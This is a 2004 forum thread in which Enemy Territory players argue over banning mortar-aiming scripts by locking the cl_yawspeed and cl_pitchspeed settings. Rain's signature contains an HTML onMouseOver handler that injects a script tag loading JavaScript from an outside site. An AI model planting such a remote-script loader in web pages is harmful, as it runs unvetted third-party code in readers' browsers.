Banning mortar scripts

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Ragnarok|GER

Post by Ragnarok|GER »

Spark2 wrote:It would make it impossible to aim with joysticks! :o
But as Bani said, you could still use something like this: http://www.tethyssolutions.com/product.htm
i thought etpro anticheat bans external programs?
aurellie

Post by aurellie »

take a look at this one. Not finished yet though, as stated in demo...

(make sure you use some download manager as this link quickly drops european clients...)

http://spqr-clan.com/forum/index.php?ac ... st&id=4995
Sphere

Post by Sphere »

Sphere wrote:Any reason why this simple addition to a config would cause problems in other parts of the game, please post away guys. Thanks for the help so far.
duke'ku wrote:There are fucking TONS of legitimate uses for cl_*speed, and stopping MORATAHR BOTS does NOT outweigh the actual uses for those commands.
Well then post what they are as requested, or make an alternate suggestion - rather than using ridiculous font sizes to make up for your lack of constructive thought.
Last edited by Sphere on Wed Aug 25, 2004 6:39 pm, edited 2 times in total.
gotenks

Post by gotenks »

honestly, it's your server... if you do this and people like it, they'll continue to play... if they don't they'll play else where... i personally won't block a script like this in such a way because it blocks people from doing anything with the keyboard turning
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
/*Demoman*/

Post by /*Demoman*/ »

you have to look at scripts this way..... does it give the player an unfair advantage or does it exploit known engine bugs?

does using this mortar script give them an advantage over mortars with coordinates written down on a piece of paper? the answer is no... the script is slow and you can move the mortar manually faster

so does this script deserve a ban.. nope sorry
RoadKillPuppy

Post by RoadKillPuppy »

/*Demoman*/ wrote:the script is slow and you can move the mortar manually faster
Have you seen the demo from aurellies post? That's not what I would call a slow mortar...

Anyway, please release it to the public... I can imagine a whole pack of soldiers pushing eachother around to have that perfect spot. I know what spots to mortar from now on :lol:

RKP
SickBoy

Post by SickBoy »

/*Demoman*/ wrote:does using this mortar script give them an advantage over mortars with coordinates written down on a piece of paper? the answer is no...
I think the answer is clearly 'yes'. Have you watched the demo ? Do you get the same speed and accuracy with your piece of paper?
the script is slow and you can move the mortar manually faster
What is your opinion about an aimbot that moves slower than the average player but has 100% headshot accuracy?
Ragnarok|GER

Post by Ragnarok|GER »

ok, i've written a mortar script myself during the last hour. it's so fucking easy, you won't believe it.
the problem is: it's nearly impossible to be accurate with it, because you have to use the command "wait". and the time a "wait"-unit takes, depends on your fps. and as far as we know, it's almost impossible to really hold them constant. i even set them to the minimum level and still..
don't get me wrong: the script works fine the first time you use it in a round, but it get's worser on every single shot. you always have to reaim by hand.
aurellie

Post by aurellie »

i have improved it a little bit, i don't think you will have the same opinion about script speed form now on...

http://spqr-clan.com/forum/index.php?ac ... st&id=5003
duke'ku

Post by duke'ku »

Sphere wrote:Well then post what they are as requested, or make an alternate suggestion - rather than using ridiculous font sizes to make up for your lack of constructive thought.
Don't ban them. That's my request.
aurellie

Post by aurellie »

Ragnarok everything is possible. Take a look at demo, you will see that mortar always hits the same place, almost same pixel ;)
/*Demoman*/

Post by /*Demoman*/ »

ok I watched the demo.. I thought it was sweet.. however I still fail to see how using one is either an exploit or an unfair advantage

of course Ive never been one to believe the mortar should have an 800 splash radius and a panzer only have 300

so if you are gonna fix something.. make the radius be only 600
eclipse+

Post by eclipse+ »

Whatever man, everybody who has posted in this thread is stating you shouldn't ban them.

But whatever, it's your server, you can do whatever you want on it; people won't play there.
::Amish World Order::#awo @gamesurge.net::http://www.amishworldorder.org
Rain

Post by Rain »

I'm not necessarily opposed to banning 'mortar scripts' per se (not that I think they're really that helpful); however, I don't think forcing cl_yawspeed/cl_pitchspeed to 0 is a sane way to do it. You'll break legitimate uses and still leave some scriptability open (e.g. macro recorders.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Ragnarok|GER

Post by Ragnarok|GER »

aurellie wrote:Ragnarok everything is possible. Take a look at demo, you will see that mortar always hits the same place, almost same pixel ;)
you did it only once. try to do it more times and you'll see how inaccurate it becomes.
(another reason may be my crappy pc, that can't hold even 40fps on oasis..)